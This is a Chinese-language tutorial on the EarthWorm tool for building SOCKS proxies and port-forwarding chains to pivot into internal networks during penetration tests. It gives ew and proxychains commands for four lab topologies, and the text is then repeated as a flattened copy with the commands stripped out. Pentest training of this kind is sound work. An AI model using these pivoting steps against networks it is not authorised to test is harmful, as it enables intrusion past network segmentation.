内网渗透:使用ew实现socks代理
字数 1345 2025-08-15 21:30:47

EarthWorm (EW) 内网渗透代理工具使用指南

一、工具概述

EarthWorm (简称EW) 是一款功能强大的内网穿透工具,主要用于建立SOCKS代理通道,实现内网渗透。与reGeorg相比,EW具有以下特点:

  • 服务端和客户端使用相同的可执行文件
  • 不需要跳板机运行web服务
  • 支持更复杂的渗透任务
  • 支持多平台(Windows/Linux/Mac)

二、下载与安装

下载来源:

  • CSDN: download.csdn.com
  • GitHub

三、核心功能模式

EW提供6种工作模式,通过-s参数指定:

SOCKS代理功能

  1. ssocksd - 正向SOCKS代理
  2. rcsocks - 反向SOCKS代理服务端
  3. rssocks - 反向SOCKS代理客户端

端口转发功能

  1. lcx_slave - 端口转发从端
  2. lcx_tran - 端口转发中转
  3. lcx_listen - 端口转发监听端

四、使用场景详解

场景1:正向代理(攻击者→跳板机→目标机)

网络拓扑

  • 攻击者:192.168.1.7(外网)
  • 跳板机:192.168.1.8(公网IP),192.168.56.113(内网IP)
  • 目标机:192.168.56.101(内网)

操作步骤

  1. 跳板机操作:
./ew -s ssocksd -l 8888  # 在8888端口开启SOCKS5代理
  1. 攻击者配置proxychains:
# /etc/proxychains.conf
socks5 192.168.1.8 8888
  1. 使用代理访问:
proxychains telnet 192.168.56.101

注意事项

  • Linux跳板机需开启IP转发功能

场景2:反向代理(攻击者→跳板机←内网跳板→目标机)

网络拓扑

  • 攻击者:192.168.1.7
  • 跳板机:192.168.1.8
  • 内网跳板:10.0.2.15
  • 目标机:192.168.1.9

操作步骤

  1. 跳板机操作:
./ew -s rcsocks -l 1080 -e 8888  # 监听1080,等待8888连接
  1. 内网跳板操作:
./ew -s rssocks -d 192.168.1.8 -e 8888  # 连接跳板机8888端口
  1. 攻击者配置proxychains:
# /etc/proxychains.conf
socks5 192.168.1.8 1080

场景3:跳板机主动连接内网跳板(攻击者→跳板机→内网跳板→目标机)

网络拓扑

  • 攻击者:192.168.1.7
  • 跳板机:192.168.1.8/192.168.56.113
  • 内网跳板:192.168.56.107
  • 目标机:192.168.56.101

操作步骤

  1. 内网跳板操作:
./ew -s ssocksd -l 8888  # 开启8888端口SOCKS代理
  1. 跳板机操作:
./ew -s lcx_tran -l 1080 -f 192.168.56.107 -g 8888  # 转发1080到内网跳板
  1. 攻击者配置proxychains:
# /etc/proxychains.conf
socks5 192.168.1.8 1080

场景4:多级跳板穿透(攻击者→VPS←主机A→主机B→目标机)

网络拓扑

  • 攻击者:192.168.1.7
  • VPS:192.168.1.8
  • 主机A:192.168.56.114(可出网)
  • 主机B:192.168.56.107(可访问目标)
  • 目标机:192.168.56.101

操作步骤

  1. VPS操作:
./ew -s lcx_listen -l 1080 -e 8888  # 监听1080,转发到8888
  1. 主机B操作:
ew -s ssocksd -l 9999  # 开启9999端口SOCKS代理
  1. 主机A操作:
route add 192.168.1.0 mask 255.255.255.0 192.168.56.1  # 添加路由
ew -s lcx_slave -d 192.168.1.8 -e 8888 -f 192.168.56.107 -g 9999  # 连接VPS和主机B
  1. 攻击者配置proxychains:
# /etc/proxychains.conf
socks5 192.168.1.8 1080

五、实用技巧

  1. 端口选择:尽量使用1024以上端口,避免需要root权限
  2. 路由配置:复杂内网环境可能需要手动添加路由
  3. 协议选择:EW默认使用SOCKS5协议,比SOCKS4更安全
  4. 多级穿透:在严格网络隔离环境下,可能需要多台跳板协作

六、注意事项

  1. 实际渗透中可能遇到:

    • 严格的路由控制(无默认路由)
    • 不同安全域间的防火墙限制
    • 需要多节点配合绕过限制
  2. Linux系统需确保IP转发功能开启:

echo 1 > /proc/sys/net/ipv4/ip_forward
  1. 工具使用需遵守当地法律法规,仅用于授权测试

通过灵活组合EW的6种工作模式,可以应对各种复杂的内网穿透场景,实现高效的内网渗透。

EarthWorm (EW) 内网渗透代理工具使用指南 一、工具概述 EarthWorm (简称EW) 是一款功能强大的内网穿透工具,主要用于建立SOCKS代理通道,实现内网渗透。与reGeorg相比,EW具有以下特点: 服务端和客户端使用相同的可执行文件 不需要跳板机运行web服务 支持更复杂的渗透任务 支持多平台(Windows/Linux/Mac) 二、下载与安装 下载来源: CSDN: download.csdn.com GitHub 三、核心功能模式 EW提供6种工作模式,通过 -s 参数指定: SOCKS代理功能 ssocksd - 正向SOCKS代理 rcsocks - 反向SOCKS代理服务端 rssocks - 反向SOCKS代理客户端 端口转发功能 lcx_slave - 端口转发从端 lcx_tran - 端口转发中转 lcx_listen - 端口转发监听端 四、使用场景详解 场景1:正向代理(攻击者→跳板机→目标机) 网络拓扑 : 攻击者:192.168.1.7(外网) 跳板机:192.168.1.8(公网IP),192.168.56.113(内网IP) 目标机:192.168.56.101(内网) 操作步骤 : 跳板机操作: 攻击者配置proxychains: 使用代理访问: 注意事项 : Linux跳板机需开启IP转发功能 场景2:反向代理(攻击者→跳板机←内网跳板→目标机) 网络拓扑 : 攻击者:192.168.1.7 跳板机:192.168.1.8 内网跳板:10.0.2.15 目标机:192.168.1.9 操作步骤 : 跳板机操作: 内网跳板操作: 攻击者配置proxychains: 场景3:跳板机主动连接内网跳板(攻击者→跳板机→内网跳板→目标机) 网络拓扑 : 攻击者:192.168.1.7 跳板机:192.168.1.8/192.168.56.113 内网跳板:192.168.56.107 目标机:192.168.56.101 操作步骤 : 内网跳板操作: 跳板机操作: 攻击者配置proxychains: 场景4:多级跳板穿透(攻击者→VPS←主机A→主机B→目标机) 网络拓扑 : 攻击者:192.168.1.7 VPS:192.168.1.8 主机A:192.168.56.114(可出网) 主机B:192.168.56.107(可访问目标) 目标机:192.168.56.101 操作步骤 : VPS操作: 主机B操作: 主机A操作: 攻击者配置proxychains: 五、实用技巧 端口选择 :尽量使用1024以上端口,避免需要root权限 路由配置 :复杂内网环境可能需要手动添加路由 协议选择 :EW默认使用SOCKS5协议,比SOCKS4更安全 多级穿透 :在严格网络隔离环境下,可能需要多台跳板协作 六、注意事项 实际渗透中可能遇到: 严格的路由控制(无默认路由) 不同安全域间的防火墙限制 需要多节点配合绕过限制 Linux系统需确保IP转发功能开启: 工具使用需遵守当地法律法规,仅用于授权测试 通过灵活组合EW的6种工作模式,可以应对各种复杂的内网穿透场景,实现高效的内网渗透。